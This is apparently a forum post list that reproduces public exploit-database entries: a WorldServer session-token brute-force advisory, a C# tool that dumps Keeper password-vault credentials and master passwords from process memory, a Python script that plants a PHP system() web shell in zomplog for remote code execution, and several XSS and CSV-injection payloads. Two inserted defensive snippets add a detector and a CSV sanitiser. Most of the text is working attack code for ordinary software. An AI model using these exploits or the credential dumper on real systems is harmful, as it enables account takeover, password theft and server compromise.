HireHackking

Everything posted by HireHackking

  1. Exploit Title: RWS WorldServer 11.7.3 - Session Token Enumeration

Session tokens in RWS WorldServer have a low entropy and can be enumerated, leading to unauthorised access to user sessions.

Details
=======
Product: WorldServer
Affected Versions: 11.7.3 and earlier versions
Fixed Version: 11.8.0
Vulnerability Type: Session Token Enumeration
Security Risk: high
Vendor URL: https://www.rws.com/localization/products/additional-solutions/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001
Advisory Status: published
CVE: CVE-2023-38357
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357

Introduction
============
"WorldServer offers a flexible, enterprise-class translation management system that automates translation tasks and greatly reduces the cost of supporting large volumes of local language content."
(from the vendor's homepage)

More Details
============
WorldServer associates user sessions with numerical tokens, which are always positive values below 2^31. The SOAP action "loginWithToken" allows for a high number of parallel attempts to check whether a token is valid. During analysis, many assigned tokens were found to be in the 7-digit range of values. An attacker is therefore able to enumerate user accounts in only a few hours.

Proof of Concept
================
In the following, an example "loginWithToken" request is shown:

-----------------------------------------------------------------------
POST /ws/services/WSContext HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 501
Host: www.example.com
Connection: close
User-Agent: agent

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                  xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                  xmlns:soapenv="http://schemas.xmlsoap.org">
  <soapenv:Header/>
  <soapenv:Body>
    <com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <token xsi:type="xsd:string">FUZZ</token>
    </com:loginWithToken>
  </soapenv:Body>
</soapenv:Envelope>
-----------------------------------------------------------------------

It can be saved as file "login-soap.req" and used as a request template for the command-line HTTP enumerator monsoon [1] to achieve many parallel requests:

-----------------------------------------------------------------------
$ monsoon fuzz --threads 100 \
    --template-file login-soap.req \
    --range 1-2147483647 \
    --hide-pattern "InvalidSessionException" \
    'https://www.example.com'
Target URL: https://www.example.com/

status   header   body     value   extract
500      191      560      5829099
500      191      556      6229259
200      191      3702     7545136
500      191      556      9054984
[...]
processed 12000000 HTTP requests in 2h38m38s
4 of 12000000 requests shown, 1225 req/s
-----------------------------------------------------------------------

The --range parameter reflects the possible value range of 2^31, and for each value an HTTP request is sent to the WorldServer SOAP API, where the FUZZ marker in the request template is replaced with the respective value. Additionally, responses which contain "InvalidSessionException" are hidden, as these sessions are invalid. Responses will yield a status code of 200 if an administrative session token is found. For an unprivileged user session, status code 500 is returned.

Workaround
==========
Lower the rate at which requests can be issued, for example with a frontend proxy.

Fix
===
According to the vendor, upgrading to versions above 11.8.0 resolves the vulnerability.

Security Risk
=============
Attackers can efficiently enumerate session tokens. In a penetration test, it was possible to get access to multiple user accounts, including administrative accounts, using this method in under three hours. Additionally, by using such an administrative account it seems likely to be possible to execute arbitrary code on the underlying server by customising the REST API [2]. Thus, the vulnerability poses a high risk.

Timeline
========
2023-03-27 Vulnerability identified
2023-03-30 Customer approved disclosure to vendor
2023-04-03 Requested security contact from vendor
2023-04-06 Vendor responded with security contact
2023-04-14 Advisory sent to vendor
2023-04-18 Vendor confirms vulnerability and states that it was already known and fixed in version 11.8.0.
2023-07-03 Customer confirms update to fixed version
2023-07-05 CVE ID requested
2023-07-15 CVE ID assigned
2023-07-19 Advisory released

References
==========
[1] https://github.com/RedTeamPentesting/monsoon
[2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api

RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

--
RedTeam Pentesting GmbH
Alter Posthof 1
52062 Aachen
Germany
Tel.: +49 241 510081-0
Fax : +49 241 510081-99
https://www.redteam-pentesting.de
Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
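Defensive companion to the advisory above, added here and not part of RedTeam Pentesting's text: it puts the numbers from the advisory (a token space below 2^31, about 1225 req/s, tokens observed in the 7-digit range) into an enumeration-time estimate, shows what a properly random session token looks like, and flags clients that hammer the WSContext endpoint with mostly-invalid tokens. The proxy log format and the InvalidSessionException marker column are assumptions constructed for this example.

```python
import re
import secrets
from collections import defaultdict
from datetime import datetime, timedelta


def enumeration_hours(token_space_bits: float, req_per_sec: float) -> float:
    """Hours needed to try every value of a token space at a given request rate."""
    return (2 ** token_space_bits) / req_per_sec / 3600


def hours_to_reach(max_value: int, req_per_sec: float) -> float:
    """Hours needed to count up to max_value at a given request rate (tokens start at 1)."""
    return max_value / req_per_sec / 3600


def secure_session_token() -> str:
    """What a session token should look like: 256 random bits, not a 31-bit counter."""
    return secrets.token_urlsafe(32)


# Assumed proxy log format (constructed for this example):
# <ISO-8601 timestamp> <client ip> <method> <path> <status> <exception marker or ->
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) (?P<marker>\S+)$'
)


def parse_line(line: str):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry['ts'] = datetime.fromisoformat(entry['ts'].replace('Z', '+00:00'))
    entry['status'] = int(entry['status'])
    return entry


def flag_token_enumeration(lines, window=timedelta(seconds=60), threshold=300, fail_ratio=0.9):
    """Map client IP -> peak request count inside any `window` for clients that exceed
    `threshold` requests to the SOAP endpoint with mostly InvalidSessionException replies."""
    per_ip = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry and entry['path'].startswith('/ws/services/WSContext'):
            per_ip[entry['ip']].append(entry)
    flagged = {}
    for ip, events in per_ip.items():
        events.sort(key=lambda e: e['ts'])
        start, peak = 0, 0
        for end in range(len(events)):  # sliding window over sorted timestamps
            while events[end]['ts'] - events[start]['ts'] > window:
                start += 1
            peak = max(peak, end - start + 1)
        failed = sum(1 for e in events if e['marker'] == 'InvalidSessionException')
        if peak >= threshold and failed / len(events) >= fail_ratio:
            flagged[ip] = peak
    return flagged


def constructed_sample_log():
    """Constructed log: one client firing 400 loginWithToken attempts in 40 s,
    one legitimate client logging in three times."""
    base = datetime(2023, 7, 19, 10, 0, 0)
    lines = [
        f"{(base + timedelta(milliseconds=i * 100)).isoformat()}Z 203.0.113.5 POST "
        f"/ws/services/WSContext 500 InvalidSessionException"
        for i in range(400)
    ]
    lines += [
        f"{(base + timedelta(seconds=i * 15)).isoformat()}Z 198.51.100.7 POST /ws/services/WSContext 200 -"
        for i in range(3)
    ]
    return lines


if __name__ == '__main__':
    print(f"full 2^31 space at 1225 req/s: {enumeration_hours(31, 1225):.0f} h")
    print(f"7-digit tokens (< 10^7) at 1225 req/s: {hours_to_reach(10**7, 1225):.1f} h")
    print("flagged clients:", flag_token_enumeration(constructed_sample_log()))
```

The rate-based rule is the detection counterpart of the advisory's workaround; the real fix is the token size, which the estimate makes obvious.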
  2. # Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping
# Google Dork: NA
# Date: 22-07-2023
# Exploit Author: H4rk3nz0
# Vendor Homepage: https://www.keepersecurity.com/en_GB/
# Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html
# Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4
# Tested on: Windows
# CVE : CVE-2023-36266

using System;
using System.Management;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Collections.Generic;

// Keeper Security Password vault Desktop application and Browser Extension stores credentials in plain text in memory
// This can persist after logout if the user has not explicitly enabled the option to 'clear process memory'
// As a result of this one can extract credentials & master password from a victim after achieving low priv access
// This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app.
// Github: https://github.com/H4rk3nz0/Peeper

static class Program
{
    // To make sure we are targeting the right child process - check command line
    public static string GetCommandLine(this Process process)
    {
        if (process is null || process.Id < 1)
        {
            return "";
        }
        string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}";
        using (var searcher = new ManagementObjectSearcher(query))
        using (var collection = searcher.Get())
        {
            var managementObject = collection.OfType<ManagementObject>().FirstOrDefault();
            return managementObject != null ? (string)managementObject["CommandLine"] : "";
        }
    }

    // Extract plain text credential JSON strings (regex inelegant but fast)
    public static void extract_credentials(string text)
    {
        int index = text.IndexOf("{\"title\":\"");
        int eindex = text.IndexOf("}");
        while (index >= 0)
        {
            try
            {
                int endIndex = Math.Min(index + eindex, text.Length);
                Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))");
                string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                int match_cut = match.IndexOf("} ");
                if (match_cut != -1)
                {
                    match = match.Substring(0, match_cut + "} ".Length).TrimEnd();
                    if (!stringsList.Contains(match) && match.Length > 20)
                    {
                        Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "} ".Length) + "\n");
                        stringsList.Add(match);
                    }
                }
                else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20)
                {
                    Console.WriteLine("->Credential Record Found : " + match + "\n");
                    stringsList.Add(match.TrimEnd());
                }
                index = text.IndexOf("{\"title\":\"", index + 1);
                eindex = text.IndexOf("}", eindex + 1);
            }
            catch
            {
                return;
            }
        }
    }

    // extract account/email containing JSON string
    public static void extract_account(string text)
    {
        int index = text.IndexOf("{\"expiry\"");
        int eindex = text.IndexOf("}");
        while (index >= 0)
        {
            try
            {
                int endIndex = Math.Min(index + eindex, text.Length);
                Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)");
                string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                if ((match.Length > 2))
                {
                    Console.WriteLine("->Account Record Found : " + match + "\n");
                    return;
                }
                index = text.IndexOf("{\"expiry\"", index + 1);
                eindex = text.IndexOf("}", eindex + 1);
            }
            catch
            {
                return;
            }
        }
    }

    // Master password not available with SSO based logins but worth looking for.
    // Disregard other data key entries that seem to match: _not_master_key_example
    public static void extract_master(string text)
    {
        int index = text.IndexOf("data_key");
        int eindex = index + 64;
        while (index >= 0)
        {
            try
            {
                int endIndex = Math.Min(index + eindex, text.Length);
                Regex reg = new Regex("(data_key[ -~]+)");
                var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
                Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})");
                if (match_one.Replace("data_key", "").Length > 5)
                {
                    if (!clean.IsMatch(match_one.Replace("data_key", "")))
                    {
                        Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n");
                    }
                }
                index = text.IndexOf("data_key", index + 1);
                eindex = index + 64;
            }
            catch
            {
                return;
            }
        }
    }

    // Store extracted strings and compare
    public static List<string> stringsList = new List<string>();

    // Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8
    // Performs OpenProcess to get handle with necessary query permissions
    static void Main(string[] args)
    {
        foreach (var process in Process.GetProcessesByName("keeperpasswordmanager"))
        {
            string commandline = GetCommandLine(process);
            if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7"))
            {
                Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString());
                Console.WriteLine("->Searching...\n");
                IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id);
                IntPtr address = new IntPtr(0x10000000000);
                MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();
                while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0)
                {
                    if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000)
                    {
                        byte[] buffer = new byte[(int)memInfo.RegionSize];
                        if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0)
                        {
                            string text = Encoding.ASCII.GetString(buffer);
                            extract_credentials(text);
                            extract_master(text);
                            extract_account(text);
                        }
                    }
                    address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64());
                }
                CloseHandle(processHandle);
            }
        }
    }

    [DllImport("kernel32.dll")]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);

    [DllImport("kernel32.dll")]
    public static extern bool CloseHandle(IntPtr hObject);

    [DllImport("ntdll.dll")]
    public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);

    [StructLayout(LayoutKind.Sequential)]
    public struct MEMORY_BASIC_INFORMATION
    {
        public IntPtr BaseAddress;
        public IntPtr AllocationBase;
        public uint AllocationProtect;
        public IntPtr RegionSize;
        public uint State;
        public uint Protect;
        public uint Type;
    }
}
  3. # Exploit Title: RosarioSIS 10.8.4 - CSV Injection
# Google Dork: NA
# Exploit Author: Ranjeet Jaiswal
# Vendor Homepage: https://www.rosariosis.org/
# Software Link: https://gitlab.com/francoisjacquet/rosariosis/-/archive/v10.8.4/rosariosis-v10.8.4.zip
# Affected Version: 10.8.4
# Category: WebApps
# Tested on: Windows 10
#
#
# 1. Vendor Description:
#
# RosarioSIS has been designed to address the most important needs of administrators, teachers, support staff, parents, students, and clerical personnel. However, it also adds many components not typically found in Student Information Systems.
#
# 2. Technical Description:
#
# A CSV Injection (also known as Formula Injection) vulnerability in the RosarioSIS web application version 10.8.4 allows malicious users to execute a malicious payload in csv/xls and redirect an authorized user to a malicious website.
#
# 3. Proof Of Concept:

3.1. Proof of Concept for CSV injection.

# Steps to reproduce.
Step 1: Log in to RosarioSIS 10.8.4
Step 2: Go to the Periods page
Step 3: Add a CSV injection redirection payload such as "=HYPERLINK("https://www.google.com","imp")" in the Title field
Step 4: Click on the Save button to save the data.
Step 5: Go to the export tab and export the data
Step 6: When the user opens the downloaded Periods.xls file, you will see the redirection hyperlink.
Step 7: When the user clicks on the link, the user will be redirected to the attacker's or a malicious website.

# 4. Solution: Upgrade to the latest release of RosarioSIS.
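The export-side fix for the formula injection described above, as an added example that is not RosarioSIS code: cells whose first non-blank character is a spreadsheet formula trigger are prefixed with an apostrophe so the client shows them as text, genuine numbers are left alone, and every cell is quoted so embedded separators cannot create new cells. Column names and the sample rows are constructed.

```python
import csv
import io

# Characters that make Excel/LibreOffice treat a cell as a formula.
FORMULA_TRIGGERS = ('=', '+', '-', '@', '\t', '\r')


def _is_plain_number(value: str) -> bool:
    """True for values such as -5 or 1e3 that are numbers, not formulas."""
    try:
        float(value)
        return True
    except ValueError:
        return False


def neutralise_cell(value) -> str:
    """Prefix a formula-looking cell with an apostrophe so spreadsheet clients show it as text.
    Leading whitespace is skipped before the check so the rule stays conservative."""
    text = '' if value is None else str(value)
    if text.lstrip().startswith(FORMULA_TRIGGERS) and not _is_plain_number(text):
        return "'" + text
    return text


def export_csv(header, rows) -> str:
    """Write rows as CSV with every cell quoted and formula triggers neutralised."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator='\n')
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralise_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample: the first period title carries the payload from the report above,
# the third shows a harmless title that merely starts with a trigger character.
CONSTRUCTED_PERIODS = [
    ('=HYPERLINK("https://www.google.com","imp")', 1),
    ('Period 2', 2),
    ('-Afternoon', -3),
]

if __name__ == '__main__':
    print(export_csv(('Title', 'Sort Order'), CONSTRUCTED_PERIODS))
```

Input-side validation of the Title field is the other half; neutralising at export protects every consumer of the file regardless of where the value came from.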
  4. Exploit Title: Perch v3.2 - Stored XSS
Application: Perch Cms
Version: v3.2
Bugs: XSS
Technology: PHP
Vendor URL: https://grabaperch.com/
Software Link: https://grabaperch.com/download
Date of found: 21.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. login to account
2. go to http://localhost/perch_v3.2/perch/core/settings/
3. upload svg file
"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>
"""
4. go to svg file (http://localhost/perch_v3.2/perch/resources/malas.svg)
  5. #Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)
#Application: zomplog
#Version: v3.9
#Bugs: RCE
#Technology: PHP
#Vendor URL: http://zomp.nl/zomplog/
#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
#Date of found: 22.07.2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

import requests

#inputs
username=input('username: ')
password=input('password: ')

#urls
login_url="http://localhost/zimplitcms/zimplit.php?action=login"
payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"
rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
poc_url="http://localhost/zimplitcms/poc.php"

#login
session = requests.Session()
login_data=f"lang=en&username={username}&password={password}&submit=Start!"
headers={
    'Cookie' : 'ZsessionLang=en',
    'Content-Type' : 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
}
login_req=session.post(login_url,headers=headers,data=login_data)
if login_req.status_code == 200:
    print('Login OK')
else:
    print('Login problem.')
    exit()

#payload
payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"
pheaders={
    'Content-Type' : 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
}
payload_req=session.post(payload_url,headers=pheaders,data=payload_data)

#rename
rename_req=session.get(rename_url)

#poc
poc_req=session.get(poc_url)
print(poc_req.text)

#youtube poc video - https://youtu.be/nn7hieGyCFs
  6. # Exploit Title: mooDating 1.2 - Reflected Cross-site scripting (XSS)
# Exploit Author: CraCkEr aka (skalvin)
# Date: 22/07/2023
# Vendor: mooSocial
# Vendor Homepage: https://moodatingscript.com/
# Software Link: https://demo.moodatingscript.com/home
# Version: 1.2
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-3849, CVE-2023-3848, CVE-2023-3847, CVE-2023-3846, CVE-2023-3843, CVE-2023-3845, CVE-2023-3844

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /matchmakings/question

URL parameter is vulnerable to RXSS

https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number=
https://website/matchmakings/question[XSS]?number=

Path: /friends

URL parameter is vulnerable to RXSS

https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model
https://website/friends[XSS]/ajax_invite?mode=model

Path: /friends/ajax_invite

URL parameter is vulnerable to RXSS

https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model
https://website/friends/ajax_invite[XSS]?mode=model

Path: /pages

URL parameter is vulnerable to RXSS

https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l
https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l

Path: /users

URL parameter is vulnerable to RXSS

https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity
https://website/user[XSS]/view/108?tab=activity

Path: /users/view

URL parameter is vulnerable to RXSS

https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity
https://website/users/view[XSS]/108?tab=activity

Path: /find-a-match

URL parameter is vulnerable to RXSS

https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0
https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0

[XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6

[-] Done
  7. # Exploit Title: Perch v3.2 - Persistent Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 23-July-2023
# Exploit Author: Dinesh Mohanty
# Vendor Homepage: https://grabaperch.com/
# Software Link: https://grabaperch.com/download
# Version: v3.2
# Tested on: Windows
# CVE : Requested

# Description:
A Stored Cross Site Scripting (Stored XSS) vulnerability is found in the file upload functionality under the create asset section.

# Steps to Reproduce
The user needs to log in to the application and follow the steps below:
1. Log in to the application
2. From the left side menu go to Assets (http://URL/perch/core/apps/assets/)
3. Click on "Add assets" and fill in all other details (please note that not all the text fields are vulnerable to XSS as they have output encoding)
4. Create the SVG file with the contents below, say xss.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS");
  </script>
</svg>

5. In the File upload section upload the above SVG file and submit
6. Now go to the above SVG directly, say the file is xss.svg
7. Go to the svg file (http://URL/perch/resources/xss.svg) or view all Assets and view the image
8. One can see that we got an XSS alert.
  8. # Exploit Title: Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Tested on: Ubuntu 20.04
# Blog: http://msecureltd.blogspot.com

XSS #1:

Steps to Reproduce:
1. Browse to Bookings
2. Select All Bookings
3. Edit booking and select Promo Code
4. Enter payload TEST"><script>alert(`XSS`)</script>

// HTTP POST request
POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

[...]
edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1
[...]

// HTTP response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 205
[...]

// HTTP GET request to Bookings page
GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

// HTTP response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 33590
[...]

[...]
<label class="control-label" for="promo_code">Promo code:</label>
<input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder="">
</div>
[...]

Unrestricted File Upload #1:

// SVG file contents
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(`XSS`);
  </script>
</svg>

Steps to Reproduce:
1. Browse My Account
2. Image Browse -> Upload
3. Then right click on image
4. Select Open Image in New Tab

// HTTP POST request
POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

[...]
-----------------------------13831219578609189241212424546
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(`XSS`);
  </script>
</svg>
[...]

// HTTP response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 190
[...]
  9. Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS)
Application: Zomplog
Version: v3.9
Bugs: XSS
Technology: PHP
Vendor URL: http://zomp.nl/zomplog/
Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
Date of found: 22.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. Login to account
2. Add new page
3. Set as <img src=x onerror=alert(4)>
4. Go to menu

Poc request:

POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
Host: localhost
Content-Length: 11
sec-ch-ua:
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
Connection: close

empty=empty
  10. # Exploit Title: Joomla HikaShop 4.7.4 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 24/07/2023
# Vendor: Hikari Software Team
# Vendor Homepage: https://www.hikashop.com/
# Software Link: https://demo.hikashop.com/index.php/en/
# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/hikashop/
# Version: 4.7.4
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /index.php

GET parameter 'from_option' is vulnerable to RXSS

https://website/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=[XSS]&from_ctrl=product&from_task=listing&from_itemid=103

Path: /index.php

GET parameter 'from_ctrl' is vulnerable to RXSS

https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=[XSS]&from_task=listing&from_itemid=103

Path: /index.php

GET parameter 'from_task' is vulnerable to RXSS

https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=[XSS]&from_itemid=103

Path: /index.php

GET parameter 'from_itemid' is vulnerable to RXSS

https://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=listing&from_itemid=[XSS]

[XSS Payload]: uhqum"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wcn46

[-] Done
  11. # Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution
# Date: 26/07/2023
# Exploit Author: p4r4bellum
# Vendor Homepage: https://getgreenshot.org
